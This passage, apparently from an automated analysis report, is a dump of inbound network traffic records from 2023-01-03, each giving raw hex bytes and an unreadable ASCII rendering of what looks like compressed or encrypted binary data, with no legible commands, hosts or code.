10 12 53 7c af 72 42 5b 95 ef 2f ae 9b 5a da eb bb 01 87 8c 0f 4f 17 33 cd 0b 5a b9 Data Ascii: F[b,;z1DP@p\|s}8%)3C{S7Af[EU9e~{6xB<Y^/P[(9Va9k[fxK5whhnvx.\^wqHTtY[NB]`J2B]O6&#7DB4kqS\|rB[/ZO3Z
2023-01-03 15:29:20 UTC	648	IN	Data Raw: 7d dd 79 f3 74 5b 5b 19 27 6a d2 cb c7 6a 61 46 ba f9 d0 f3 ec e2 7e d8 b0 4e f6 ec 34 09 f9 0c f6 31 eb 4e de 5e bc 85 4f 7b d4 93 4c ff 45 40 91 69 94 94 f7 d9 12 45 c0 8b 68 7d df 7b f7 a7 fd 30 af f4 c8 05 81 a7 b4 96 f7 3b 62 5b 17 af 07 cf bf 70 9c b7 65 aa c1 3f ae 14 de 95 56 29 bc 91 64 1e 71 fd f4 27 ea 8f 0d e5 37 da 31 c2 71 33 c1 68 50 fa d6 6c 07 fb 94 ec 68 a2 36 ea a0 a1 96 97 be 52 ea 07 dd 1a 3c 86 df 3b 05 49 2e d6 b4 3e 06 9d 11 8f 22 fe 5b 1d c2 76 f5 f2 a4 57 11 4f 2d db 36 c8 c6 04 01 bc 44 7c f2 11 fd 05 cf f6 9d d4 12 97 68 7d cd 14 ed 0d e5 6e be 0d 4b c0 fe 22 a7 43 10 4c f3 49 83 c4 cf 90 af 8d 45 dd 21 c4 af 23 3e 30 8a 9d 49 c7 ac 63 89 76 d7 3c ac 97 7b fb 25 6d 6a c6 6f fc c6 f7 bc 75 d6 61 2e e6 ce 2a c7 2a c1 b6 60 25 23 Data Ascii: }yt[['jjaF~N41N^O{LE@iEh}{0;b[pe?V)dq'71q3hPlh6R<;I.>"[vWO-6D\|h}nK"CLIE!#>0Icv<{%mjoua.**`%#
2023-01-03 15:29:20 UTC	649	IN	Data Raw: 8d 0b b2 25 64 7c d8 b2 80 33 41 fb 5c 16 e8 6c a8 e3 bc 6d 46 f6 69 96 53 97 52 d5 d0 2e da 3a 65 9d 7f 0c ba 61 7b a7 e6 6c 49 ea 4b 2e cb af c3 4e b3 25 ee b9 a9 b5 53 b8 4c 5e 29 de c1 b7 bc d6 3b 8c 5f a2 be 9a 1d 55 8b 6f 07 0f c5 79 b7 61 60 41 56 1e fb 46 26 5b b7 85 2e 7a 80 09 ef 6b b8 2c 00 eb 77 67 66 70 7f 6d da c6 dd 7e 83 23 f2 54 7e 7d 45 e1 f9 07 2f 86 ec d8 50 7f b1 d6 25 c8 9d 63 c3 1a 15 17 9b a0 0a 4d f1 d3 a0 76 26 6c c9 bf 8d 52 b3 91 3b d6 75 44 2e 06 4c 84 6a 52 d3 e8 47 4d 0d 15 96 2c 70 c3 f2 da 77 c0 f4 2d 4b e6 fe be 41 50 4d d2 0b fb 55 e3 b8 a0 c9 82 cc a5 3a 65 bc 9b b8 a0 e4 c8 4d 4b 2b 91 5f 63 44 ef a6 1a 25 e9 b9 88 93 ae 6b c9 66 0f 4b 47 47 10 11 7e e5 a8 ea df 76 6f c1 cf d5 6f a6 9e f3 6b 6a d9 ea 9b 7a f8 cb 79 81 Data Ascii: %d\|3A\lmFiSR.:ea{lIK.N%SL^);_Uoya`AVF&[.zk,wgfpm~#T~}E/P%cMv&lR;uD.LjRGM,pw-KAPMU:eMK+_cD%kfKGG~vookjzy
2023-01-03 15:29:20 UTC	664	IN	Data Raw: fb 2d c9 6f 1a 6d ef 7a 75 e7 ef f4 4f 31 8e df 86 dd 7f 70 af 74 c1 87 c8 75 9f 4a 46 ae 98 ed 78 51 e7 77 76 c9 08 83 3d a3 36 7a a5 9f 9a 39 df f0 f3 b4 3b 7b 2c d3 1a 76 f1 a8 2e a7 ed c7 ca 4d b9 dd 54 7c 2c f3 ca 65 49 ce e2 f1 5f 5a be d6 fc 3c 72 64 73 a1 de 28 f7 22 8d 34 4f f9 35 37 ac 35 e7 67 87 6c 09 78 12 63 ec 33 e6 d8 44 e5 89 05 37 fa 73 14 be 2d 3a 7e a3 26 bc e6 e0 87 df eb 57 8c d1 3e cb e5 68 7a 5e af fe ea 5b bc a2 f1 32 6d 5f 4d 9a 85 5c 0c ed d8 fe f8 d5 6d ca eb 6f 24 6d d6 be 7c e9 42 7d a5 51 78 dd a6 da 5f 3b 57 55 7f 9e 1a 91 19 1e fc e0 f5 e3 69 ca 5a 92 8f 3b 2a 73 d3 57 5e ac 60 15 c5 7d 77 0f 69 a9 af bd 9c 28 eb b9 e9 da 92 f5 e1 61 d2 6f ad 27 e6 33 39 af 34 63 c2 93 e8 2f 9d 4e ba 2a d9 dc 4e 9a 11 c5 a0 9f 8c 50 31 49 Data Ascii: -omzuO1ptuJFxQwv=6z9;{,v.MT\|,eI_Z<rds("4O575glxc3D7s-:~&W>hz^[2m_M\mo$m\|B}Qx_;WUiZ;sW^`}wi(ao'394c/NNP1I
2023-01-03 15:29:20 UTC	680	IN	Data Raw: 2a 1a b0 43 48 60 ef 90 26 ab 2a 3b 57 0c dc 6f d1 4b 71 60 8a a2 3e 90 14 f6 01 15 6a 95 58 12 ec 11 6c 25 4a cd 5e 86 22 3b 30 6f 2a a5 89 cd f0 0a c7 43 05 ca 43 38 32 c8 63 f3 a9 aa 68 7d ca 1d ad 4f 65 fc 68 3c aa 26 c3 90 01 2a a5 f3 b6 83 23 92 15 73 01 cf fa f7 58 3e 07 64 5b 04 5b f3 41 cb b9 cf ed 6c 16 1c d8 c0 c6 35 11 d2 7c 3e 58 b0 fa dd 69 1e b8 10 74 c1 98 c3 e6 41 cf d0 3f 36 c7 00 74 8e f0 4b e7 f0 d9 7c 9e b9 9a b4 11 43 4c 23 33 20 09 e7 e0 40 c4 17 45 f2 4f 87 ef 4e 14 0d 76 ca f0 fe 12 78 a9 c3 df f5 f0 9a 28 29 f4 4e 2e c1 6b 17 1a fc 60 5b 16 a0 f2 68 20 93 46 1e 96 ef 46 be 2e 70 18 75 60 0e 81 4d e3 7e 43 6b 48 58 b7 88 31 52 14 2a 95 ad a8 2a 25 74 a8 5b d1 14 40 84 d2 a0 3f 5d 29 01 0d 2d 86 34 e2 e4 14 52 33 36 63 e3 a0 2c 49 Data Ascii: CH`&;WoKq`>jXl%J^";0oCC82ch}Oeh<&#sX>d[[Al5\|>XitA?6tK\|CL#3 @EONvx()N.k`[h FF.pu`M~CkHX1R**%t[@?])-4R36c,I
2023-01-03 15:29:20 UTC	681	IN	Data Raw: 21 b4 06 47 30 8c 04 5d 84 a4 5d 38 62 83 25 63 e9 38 ba 99 67 91 11 6d a4 03 8d 3d f7 cd 93 1a b1 26 f7 df bc 8a 24 d6 3e f2 7f 8b f5 56 79 b1 62 3d 0f e2 13 64 11 de af 26 07 b6 be 2e 75 13 aa 3e 79 6c 08 60 c8 73 99 c3 91 6d 5b 6b fd 62 0f e8 5d f8 d8 8d a0 b9 e3 3a d0 94 c0 c0 f8 06 d5 f7 0d 52 85 da 91 89 d8 99 fc 35 03 dc 33 5b d9 88 87 55 95 1d ec 3e 68 11 97 93 e0 0a ba ff 6d 08 85 8f 26 c9 b8 86 c8 46 28 9f 4e 29 3d 00 52 ac f3 75 f1 28 35 75 a5 30 57 1d a2 d4 e4 08 1a 48 28 97 20 b8 bd cb 35 65 c1 bb b7 ed 34 3c 9c fa 5f a2 a5 ce 11 f4 92 c0 87 20 70 a3 73 5b f7 81 13 8a 7d 04 89 a6 49 49 46 a8 0b 5f 4b 83 ce 9b 02 11 ae 15 59 ba 17 f7 0d f3 05 7b 2e b8 45 10 c6 cc b8 b6 c1 09 15 e1 98 69 49 82 bd 8e 60 9f ae 9f 67 03 be 66 4c f6 26 0c 3a 74 6d Data Ascii: !G0]]8b%c8gm=&$>Vyb=d&.u>yl`sm[kb]:R53[U>hm&F(N)=Ru(5u0WH( 5e4<_ ps[}IIF_KY{.EiI`gfL&:tm
2023-01-03 15:29:20 UTC	694	IN	Data Raw: 53 50 42 02 ff 07 65 0a b1 62 61 ca 8e 38 df 66 3a b8 16 25 09 6f 1a 0f ce cb 48 f5 49 6a f6 49 c4 69 49 53 a4 ad 76 a3 55 b0 4f 47 5b 66 a3 dc 07 3c b0 e2 2d f3 12 0f 3c a7 3f 5d c4 07 b9 0f 87 2a 01 25 ef ad cb 50 98 e1 8c b7 33 0f f1 79 a0 7b 58 84 39 1f d0 fc 63 cf 83 fc 69 d1 69 2c 16 9b cd 06 35 2b c7 9a 70 50 be 04 71 ab ac fa 14 61 8e 04 34 a4 ea a2 53 27 d0 e1 a1 90 be 11 d2 a2 d5 56 94 00 08 7e e9 41 67 74 a1 a3 97 e0 67 35 2c d3 23 25 8c 9c 7a 0b cb ed 80 9f 4f e1 33 58 49 8a 26 9a 81 91 16 9e c3 f6 13 7e 3f 04 ef cf 82 9f 47 e1 75 02 c2 0c 43 ab b7 1a 54 34 fb 82 56 3c e8 b0 3f 0f 1e 4f 38 8f fa 73 09 33 86 e0 2f c9 0a 3e 88 61 11 63 7b b1 2c f2 4f 1f d6 f7 66 c2 81 0c 7d 00 33 a9 79 b8 ec 4f d8 11 a4 e0 3a f7 e3 72 b0 7a 56 16 61 03 b9 9c a4 Data Ascii: SPBeba8f:%oHIjIiISvUOG[f<-<?]*%P3y{X9cii,5+pPqa4S'V~Agtg5,#%zO3XI&~?GuCT4V<?O8s3/>ac{,Of}3yO:rzVa
2023-01-03 15:29:20 UTC	710	IN	Data Raw: 17 1c 05 bf 12 4f cd b6 b9 ec 44 2d ec 9e 37 df 6e 97 1d 2e e5 fa 71 09 8a e7 cc 31 86 8d 12 4b d7 5e d4 80 5b 33 e8 15 b9 8a fc ec 8e 6b 67 a9 8c 8d 32 1d 96 5c 83 56 c2 d3 ef 89 17 94 1c d3 78 02 db a6 e5 d5 06 6d 25 79 35 12 39 1f 9d 51 b1 94 80 1a 8a ad 68 c8 13 eb 56 5f 9c ee 05 be 5d 8f c3 de 33 e5 56 f2 25 21 82 c4 96 47 73 0b 5a 68 3a b5 15 92 f5 5a 72 aa 2f b2 4e b6 53 c6 d2 31 a1 00 4d 11 b0 46 b3 e6 85 2f b8 95 33 4b 39 a1 74 42 58 00 64 6f ff ad 06 91 e3 01 99 3b e4 82 b6 51 21 29 70 71 78 8b e2 0c d1 4d b4 ee f2 f7 6c 5a 3c 38 0f 8b 5a e3 80 a3 b1 19 7a c3 ee 56 a3 4d 0c a1 60 44 fe 99 63 c8 09 f9 f0 d7 ba 03 6d e9 7b 7e 8e 24 fd f7 5a 10 a2 8a c0 c1 21 d1 c7 e0 67 c3 61 8d f9 23 09 1e 54 80 4b 29 39 44 34 8a 26 5e 5f 54 9d 2c 83 77 cf 8a f1 Data Ascii: OD-7n.q1K^[3kg2\Vxm%y59QhV_]3V%!GsZh:Zr/NS1MF/3K9tBXdo;Q!)pqxMlZ<8ZzVM`Dcm{~$Z!ga#TK)9D4&^_T,w
2023-01-03 15:29:20 UTC	711	IN	Data Raw: ac 1c 69 c9 2b 90 18 0a 2c c6 a2 47 ae c9 2a 1c 53 d4 44 ee 9c b6 de db 8f 12 2b 90 67 ce 97 8a 9d 43 ba f2 62 cf b6 c1 70 21 47 90 1a 49 3d b6 c2 d0 66 38 1d 25 bb 6f b9 46 a6 e1 d9 91 3c af 19 48 3a 9d 79 2a 03 9d 7c 13 17 3b e1 4f b9 be c7 30 76 fc 57 c6 ed 81 b6 f4 7b ec 3d 69 cd c4 1e 97 84 4b c3 87 77 82 9a 9f f7 fd 16 f6 98 16 20 d1 5b a6 70 b2 bc 98 68 2e 5a a5 fc 93 cb 95 7d bc 7d c7 6a 39 f0 a4 92 63 90 01 66 b5 98 e0 86 a5 af 4f 7e 80 7e 17 cb 35 b1 43 d6 4f 71 7a 3c 4d ed 29 da a0 3d 39 d3 97 ee bf b9 ae d3 49 4e fd 37 8f 44 2f 25 0b 18 36 fe ae b7 10 5e 7c d9 f8 1a 4a d7 af 1d 07 43 2e 0f 98 ce c0 03 59 87 5d d0 ee 44 f6 48 c6 c1 30 76 b8 37 c4 f7 9b 1d ea 7f 3a b1 9b 71 c2 b3 2c 51 a3 1c e9 67 0d c5 cd a2 09 a7 dd 8c e6 ce 98 56 3c 7b 58 da Data Ascii: i+,GSD+gCbp!GI=f8%oF<H:y\|;O0vW{=iKw [ph.Z}}j9cfO~~5COqz<M)=9IN7D/%6^\|JC.Y]DH0v7:q,QgV<{X
2023-01-03 15:29:20 UTC	711	IN	Data Raw: bb 80 3d 30 04 3a 85 60 41 38 4c f9 84 8e 05 b4 30 71 5b ad 5b 38 14 ad ec f6 53 c1 50 de a3 9d bd f8 aa bc 6f a1 4c c9 47 01 7c d4 01 21 7a 36 d5 5c 4e 11 da bd 34 f8 bf 52 c8 2d 58 5e a6 ae 20 c3 bf af 42 33 c7 8f 4d 0a 58 42 04 34 02 81 16 3c 98 72 12 4a 9d ba 23 48 6f a7 0e 31 b0 c7 cb 3a 22 90 86 08 a2 b2 7b 2e 43 53 97 83 6f d5 32 e9 c8 fc f8 b2 87 be 76 22 a0 ac e8 b2 d1 5f f0 d0 a4 01 ed 87 52 bb c5 c9 1a bf fe a5 f1 65 9a d4 7b 59 3c 26 f8 2b 2d 9d 50 a0 0b 65 7c 67 4e c6 ab 78 f5 a8 c2 8b b8 bb d0 c7 e2 e7 d6 7f cf fd 69 5c 11 4d 53 51 62 0b ca 62 f7 cd a9 3d 0d b0 aa 5a a1 fb f0 3c 3a 79 bb 03 8e fc 5c 3a 1f a6 ae 4b f8 6d b7 c3 bc cb f1 45 41 7f ef 4e b4 03 fa 3e be 21 83 4a cf da 36 b3 39 6c 1a 98 5c 6b 5b 4e 98 14 d5 ca 02 9b 67 6d 88 76 d8 Data Ascii: =0:`A8L0q[[8SPoLG\|!z6\N4R-X^ B3MXB4<rJ#Ho1:"{.CSo2v"_Re{Y<&+-Pe\|gNxi\MSQbb=Z<:y\:KmEAN>!J69l\k[Ngmv
2023-01-03 15:29:20 UTC	727	IN	Data Raw: ef a7 42 19 6c 69 c5 1a e4 b1 56 9b 83 f0 5e 4b ea 1b ad 8a cd 88 67 0f b5 d2 1d 83 5b 86 a9 4e ae a2 be 60 a9 fb e8 1e 54 ea 1c d6 dd a1 85 e3 59 9f 6c 82 cb 8f cb 8f 65 a0 f6 db b0 ca b0 b0 5d c7 f5 0c 94 6e 2d cf 0c 19 67 ee d6 d9 ec b0 a5 df 9b 7a b0 b9 e0 cf 99 50 b2 d7 f7 7d 8c 9d 70 dd f1 8b 03 77 43 c1 3f 07 be b9 9c 0c 24 ce 5c d1 13 12 fb b5 0b b7 c3 a5 bd 96 c9 64 bd 0f 6d d6 f2 32 94 39 ff b2 0e f4 ed 56 ba 10 16 62 b4 3b a0 e1 ef f9 33 19 78 ff 66 40 3d b0 05 2d c9 6b 87 b2 9a 76 ad 5d 0e d8 f6 24 b1 16 41 b9 b3 63 d3 2b 0e 3b cc cc 99 78 c4 96 7e 84 4f 37 9e ef 6e 01 f4 dd ed 02 ef ea cd 35 40 fb a6 a7 78 c2 ca 46 34 46 a5 a5 85 0f 1b 88 b3 43 34 1d 7f 71 fe 7a 8d 59 34 06 7e dd 2b 7a 4d c0 e9 6a 77 b8 37 d1 ce 99 b1 69 53 61 24 fa 62 98 4b Data Ascii: BliV^Kg[N`TYle]n-gzP}pwC?$\dm29Vb;3xf@=-kv]$Ac+;x~O7n5@xF4FC4qzY4~+zMjw7iSa$bK
2023-01-03 15:29:20 UTC	728	IN	Data Raw: f6 6e 4c 48 75 27 bc ae 73 59 a0 7a 99 fd 35 11 35 34 b6 46 46 1d 9e ac bb 89 ba a8 c0 74 ba c3 04 0f 4d 46 c8 76 80 69 cb 32 58 10 01 33 32 c6 20 07 b5 eb 43 ce 7c b9 ae c1 d0 a6 7b 4b f2 5b f0 55 18 95 fe ca 20 45 10 75 55 50 1b 8c 58 aa d3 33 47 d4 d2 6c 6a ba d7 25 fb 60 5e 66 78 bd e1 cd 31 91 5d 9f aa 65 35 87 e6 cf 82 c3 0e 5b 3b e7 b1 68 ae 56 49 cc d5 6b e9 b9 ca 87 7d 9d 12 5c 26 0c 6a 25 1e bf c5 ef 6b 80 bf 5a e7 d6 62 e2 19 85 91 d6 8c 94 4d 14 76 f3 33 1a c5 b4 c8 36 15 96 8f a1 99 df b3 f6 4a ee 29 ea 8a 79 a2 44 61 d0 89 92 5d 59 f2 1b 05 42 30 1d 76 94 4f 88 49 09 65 7e 96 7a c4 1b fa 60 f2 c2 3f c1 35 d1 95 23 05 1b 6d 73 7b ac 78 fc 5d 24 1a dd 20 dd 28 26 af 85 49 91 79 83 a1 e5 ac d5 fc 32 70 a6 40 ae 29 bd 51 87 26 f2 63 a2 d1 7f fd Data Ascii: nLHu'sYz554FFtMFvi2X32 C\|{K[U EuUPX3Glj%`^fx1]e5[;hVIk}\&j%kZbMv36J)yDa]YB0vOIe~z`?5#ms{x]$ (&Iy2p@)Q&c
2023-01-03 15:29:20 UTC	743	IN	Data Raw: d1 81 49 a8 4b a8 72 af bf 2a 2c 36 35 e3 58 5a 55 e2 d6 31 e9 c8 01 3c 57 84 d8 f4 d0 e3 de 2f 7e 92 4e 14 bc 9e b7 02 d2 90 23 55 e7 f0 26 16 d6 0a a0 d2 10 71 61 54 39 ac 98 ad 48 1e b7 07 79 68 0e 5e 6f aa e5 71 bb c8 1f 5e e5 fa c7 f0 04 5a 45 68 b5 6d 6e 22 bf 93 d4 89 cd ac 87 6d 07 67 f2 52 fb 58 b7 a3 78 3b 35 d4 72 06 a6 bf b4 09 bc 55 d5 21 91 1a dc 21 e4 c7 d3 ba 6f c0 e2 d2 63 12 60 7d 68 01 7e 1a 6b bf 10 5a af 2b 54 f4 7e 43 3c fa b0 1d a6 7e e5 e3 e1 20 b5 9d 96 ee f2 46 50 7c ca 1a 99 fc 6f 60 3d 33 91 39 50 b8 1b b3 09 ae fb 9e ef ed 87 20 af 76 cc 1a 22 24 7c c1 e3 69 09 ef 39 2e 49 f8 b3 49 d4 88 20 94 2f bb 38 f9 e2 4b ab 67 c4 fe db db 6d 81 6f ce f9 e9 9c 2e e8 7c f4 8b 1a d6 dd 0e 8e 60 e0 cf b5 fb ad 60 4c cf 73 43 18 3b 7c c8 b7 Data Ascii: IKr*,65XZU1<W/~N#U&qaT9Hyh^oq^ZEhmn"mgRXx;5rU!!oc`}h~kZ+T~C<~ FP\|o`=39P v"$\|i9.II /8Kgmo.\|``LsC;\|
2023-01-03 15:29:20 UTC	755	IN	Data Raw: b8 dc 42 c9 91 1a 2e 14 b8 dd 1a 1a af eb 3d 5a 2e f1 79 13 fa d0 65 24 3b cb c2 e2 79 05 71 b2 42 d6 77 13 6c dc db 9d 7b 60 51 e0 d1 22 72 d8 18 f7 f8 5e 14 60 ca 23 3e c6 9d 9d 3b c4 08 e2 72 05 34 5d 09 88 fb 79 1a 33 c1 cb 0d 37 66 49 34 66 46 b0 4c 82 31 b3 dd 52 97 ea b1 ed 9b 73 11 7e 1f ba b9 51 5e 4f 1e 65 3d 79 04 f1 aa a2 1e ba 60 03 c3 b0 84 cd d0 3e 56 e4 2e af fd 43 fc a4 f3 8d d7 0a 90 47 a8 06 3c 92 73 3b 83 b3 cc e8 09 a4 65 a6 2c ed f1 8e d3 6a 3e a2 f6 45 6a ad 56 f6 85 aa 56 1b 47 a7 04 c2 0b ae b9 01 a0 4d ea 92 23 f9 f0 dc c7 75 78 ee 20 25 54 e1 5e 8f 7b 90 db da 23 44 4e 70 94 bb 21 be 9f 74 90 13 25 88 1d 5f f0 54 e7 44 38 1d e5 d8 fc 9a a6 e7 6f 76 d7 b8 be d7 30 05 c1 c3 55 08 3e a9 4e f0 5d d2 3a 06 6c 7f ad 0e 2f c7 11 ba af Data Ascii: B.=Z.ye$;yqBwl{`Q"r^`#>;r4]y37fI4fFL1Rs~Q^Oe=y`>V.CG<s;e,j>EjVVGM#ux %T^{#DNp!t%_TD8ov0U>N]:l/
2023-01-03 15:29:20 UTC	764	IN	Data Raw: 0b bf 1e cf 0d 8c 06 e4 dc ec 1a eb 34 65 e6 30 80 7b d7 fb 01 54 f6 da bc 46 be 0a 51 6d e1 9e 5a 54 97 b8 ab 8a 6a e2 47 99 a5 e3 af 15 db 1a 11 ca 13 37 8e f1 e1 e7 af 7f a4 71 89 25 ca 6f ad 15 4b 25 e6 5c 1e cc 05 6a b3 6c c5 12 5e cc fc 26 d2 44 a7 86 23 b6 7b b3 82 87 2a fe 08 e2 0a 8e c1 82 c1 26 7f d8 53 77 8c 2c 67 85 a5 1b 39 18 97 69 57 43 07 e6 6c 0b b8 75 5b 61 a3 31 ca 44 97 5c 66 63 61 41 dc a5 e0 5f f1 8f 2e 35 15 e6 9d 6f 14 bb d4 6c 77 7b 9e 82 1d 97 54 d8 11 a2 53 65 c7 3b 72 37 46 75 f0 50 9a 3d 7d ca fe 61 61 09 9d 85 1b 2b 91 66 d7 a5 46 da 4e 1d e9 4c 72 7f de db a1 c5 13 08 bf f5 8a 9b 52 0a 05 33 a9 2c 24 88 83 74 7c bb 9c 04 b3 7c 4a c6 92 f0 ad c4 23 f9 41 af 29 87 38 43 27 53 21 39 04 d1 ea c1 c3 46 13 ec 96 7b 2f b4 d0 2e 20 Data Ascii: 4e0{TFQmZTjG7q%oK%\jl^&D#{*&Sw,g9iWClu[a1D\fcaA_.5olw{TSe;r7FuP=}aa+fFNLrR3,$t\|\|J#A)8C'S!9F{/.
2023-01-03 15:29:20 UTC	780	IN	Data Raw: a6 f8 f5 08 11 bb b2 5f 0f 5b a4 77 98 8a e8 d2 a9 72 21 5a 7e e1 a7 3a 8a 6e 4c 01 68 e2 51 43 07 d7 67 4d 90 27 2e f5 d5 ba f7 a5 46 ea 0d 82 d8 52 c1 fb 70 69 ed e4 a1 09 4c e6 87 36 2a 1d 72 c9 3d ca 28 71 9e f8 52 16 2b f0 26 1d 2b 1d 19 48 19 76 7d 28 ce 6e b5 42 bb 1e e0 62 12 ee ee 9c 1c e0 84 39 7f 66 0e 84 6a 6b cb 8d b4 43 cf 92 3d 2b 39 90 13 4d 87 96 3d 0c 75 0b e6 ef 01 3b fb d7 3a 65 c5 47 76 1c d9 3f 56 c3 d5 0d 67 47 e1 3e 21 7b eb f4 91 a0 c9 5d fe 88 cd 61 b3 e3 9c 1a e9 fd cf 41 5a 0a c9 a3 89 70 01 7e 7a b9 49 51 8a 6f b8 14 f1 50 fc c4 53 e0 d3 d9 a4 8c a5 ee 7b fd a0 85 3c c5 76 bd a4 e4 c3 99 f3 99 b9 dd 98 7b d4 0a 0d 53 a8 e7 9a 3c bb 4a 63 62 48 ee 73 47 e5 63 42 2f f6 28 93 7a ec ed 54 1f 7b 6f 69 a9 9f 72 d5 98 e6 c3 ed 17 84 Data Ascii: _[wr!Z~:nLhQCgM'.FRpiL6*r=(qR+&+Hv}(nBb9fjkC=+9M=u;:eGv?VgG>!{]aAZp~zIQoPS{<v{S<JcbHsGcB/(zT{oir
2023-01-03 15:29:20 UTC	781	IN	Data Raw: a5 00 cc fb 9a f0 44 2e 94 3e da de ef 69 14 96 90 6e 64 3d 28 76 7c ad 0a bc 80 66 95 2a 61 f6 50 4d 51 55 f9 c0 99 59 23 e5 32 ef 41 ab 39 86 07 25 6f 55 ae b2 2c 67 cf 7a 6f 47 2b 45 c3 da 54 48 dd b0 55 15 fe 6d f7 72 b9 c2 49 37 f8 3d 31 7d 3f 39 c5 9e da de 3f 93 29 f6 93 22 1d 1f 50 10 dc f5 0f 79 f8 30 ae 50 60 ab 29 4d db 13 41 21 45 27 f0 99 49 aa 53 1d 9a 61 f7 8a c2 c4 3b d7 b8 7c 58 fe 92 94 78 b3 80 b6 e2 15 05 7a 33 19 bd bc e0 1e 9a 7c 61 67 af db 13 a5 2e f7 63 41 6d 8d 7e 76 cb eb df 8c 10 c6 b9 28 e4 9c 2f 84 fa b8 cb 8f 93 4f 91 c5 cb c7 da 8b b2 43 96 55 59 96 cb 49 f0 96 44 c5 9b 85 df 16 ff 54 48 9d 06 1d d7 de d1 74 ee b4 0a 45 bc 0e 3b 77 a2 d0 0a d0 d7 b6 ba 84 9f 97 13 e2 8a d6 bc 2c 40 d2 f3 f1 31 02 bc 5f d9 ac 18 b4 49 3c 79 Data Ascii: D.>ind=(v\|f*aPMQUY#2A9%oU,gzoG+ETHUmrI7=1}?9?)"Py0P`)MA!E'ISa;\|Xxz3\|ag.cAm~v(/OCUYIDTHtE;w,@1_I<y
2023-01-03 15:29:20 UTC	797	IN	Data Raw: b3 ff 2a 13 7e 8f 56 52 2f 0c 4d c4 87 0c 02 17 67 2d a3 e5 2c e6 28 26 f5 b5 38 03 3e 63 37 de 93 a2 ac 4d 33 e7 a1 a7 86 08 50 6b 32 b7 33 d0 05 98 73 79 21 82 bd d8 0c 9f e1 72 11 0d dc bb dd c5 9b 32 30 11 55 15 b4 3a fd 10 36 bc 1d 4a 31 ef 9d 48 0f 38 91 b5 00 a3 a0 1d 02 8c fb bd 5f 09 4d bb a6 51 e4 51 23 65 6e a0 e0 61 4b 04 0f 23 6b bd 32 76 fc ff 45 e3 ba b3 bd e7 a5 f2 10 ca 2a 1d eb df 9e ee bd e3 c2 f9 3d d8 c6 8c f7 dd 24 5c 39 0f 5a dc a2 cf 5f 8c 99 8e 3d 0d 8d ad c1 c7 70 f3 34 a9 6d 2e a4 31 2e 64 f6 63 0c 1a 81 80 f0 8a 35 4a 38 f7 68 20 f5 f0 cc 42 2d b0 57 ec 0b 99 f1 17 2c 0a 64 2d 9a f2 a0 e0 3d 5a d4 b0 f1 55 2a d3 c8 8c 57 17 d6 5d ca 65 14 ca 2e e5 ae 63 ba 62 75 84 c3 7c 28 c9 e2 29 ba aa a9 7e 76 c1 fb 35 c6 a2 35 88 1a 31 b9 Data Ascii: ~VR/Mg-,(&8>c7M3Pk23sy!r20U:6J1H8_MQQ#enaK#k2vE=$\9Z_=p4m.1.dc5J8h B-W,d-=ZU*W]e.cbu\|()~v551
2023-01-03 15:29:20 UTC	798	IN	Data Raw: 35 de 33 b6 e1 07 d1 9d 21 af da e9 7d 75 be 76 9b dd 0e d3 2f 7f 7f 03 47 bd db 24 9b ad b0 d9 71 70 34 17 ad 97 47 f9 7b e8 0d 4a 69 3e d3 1d 5a 88 92 af ff 88 45 9d c4 2b 0a af da 58 8a 12 3f 69 79 ba 08 3f cf 53 9e 42 72 b8 23 af e1 6a f4 a3 7a 91 63 3e d2 09 2b a3 02 4b 97 27 db 88 79 e6 df 85 18 86 cf ba 13 f7 5f 1f df ed 3b 4c 58 df 8d 51 90 b4 2a 22 10 80 7f bb da 92 cc a0 13 4c 3f 9d 9c 14 f8 33 23 b3 c7 1e 53 b9 7e cc 88 4f 8e 43 60 c3 8e ea cf a8 bc 11 97 eb 69 c4 e5 e9 e4 ce db 1e b8 35 72 94 47 6e 3d 4f dc ba 2b 54 f6 33 b4 bc 62 62 b7 ea f8 40 52 9a 69 3d 42 2d fe 58 27 94 7d 25 47 b1 75 a2 9c b7 6a fc 15 e6 5e 6b de 2c 0b 6a 1a 4c 34 93 3e 4c dc 09 4b 7b 2e b4 33 e2 42 a0 a9 d5 c9 49 4c d4 97 d0 ab 4e 1b ac ad 85 88 e1 6d f0 c3 0f b4 2d 4f Data Ascii: 53!}uv/G$qp4G{Ji>ZE+X?iy?SBr#jzc>+K'y_;LXQ*"L?3#S~OC`i5rGn=O+T3bb@Ri=B-X'}%Guj^k,jL4>LK{.3BILNm-O
2023-01-03 15:29:20 UTC	814	IN	Data Raw: 4c 31 19 44 98 5c f4 4c dd 06 4d 22 46 08 d2 ba fa e8 1a ea 83 98 14 8a ca 93 50 75 0d 9c d3 00 ab 44 b3 04 ea e9 a3 33 45 1f 3c e5 a4 a8 6a c9 f1 f4 8b a0 83 b5 90 e0 3a 40 f0 00 47 a6 d9 69 dc 5b 65 88 c9 a7 38 ad 23 9c 2e 4d ac ea 06 0e ff 79 5d c8 e7 d4 4a b3 d5 38 a7 56 88 29 a1 db 4f 38 5d ee 15 12 0c 31 a1 c9 82 c4 af 5e ba 96 78 21 e6 1c dd 7e 42 55 9d 38 73 1e ec 1b bf 59 f0 7c d2 49 b3 c1 78 fd 4e 88 a9 a6 38 5d 25 67 d5 1b 4d 9e 6f 00 4d 8b a4 02 3e 27 77 5d fd ee 88 79 4f b7 9f 50 8d 01 d7 10 18 7e 74 99 60 13 bd 93 e6 57 83 a6 ef 84 18 db 9d 42 26 72 c2 e4 c1 e0 6d 67 a1 73 b3 1d 82 43 9a fe 3a d3 f7 47 8c 0f 45 d5 12 53 31 41 82 8f 8e 72 b0 91 2e 3f cc fa b8 42 2c 91 23 89 42 29 fb f0 1a 17 1c 28 2c d8 19 22 6b fc e6 b2 05 03 c4 92 ce 48 12 Data Ascii: L1D\LM"FPuD3E<j:@Gi[e8#.My]J8V)O8]1^x!~BU8sY\|IxN8]%gMoM>'w]yOP~t`WB&rmgsC:GES1Ar.?B,#B)(,"kH
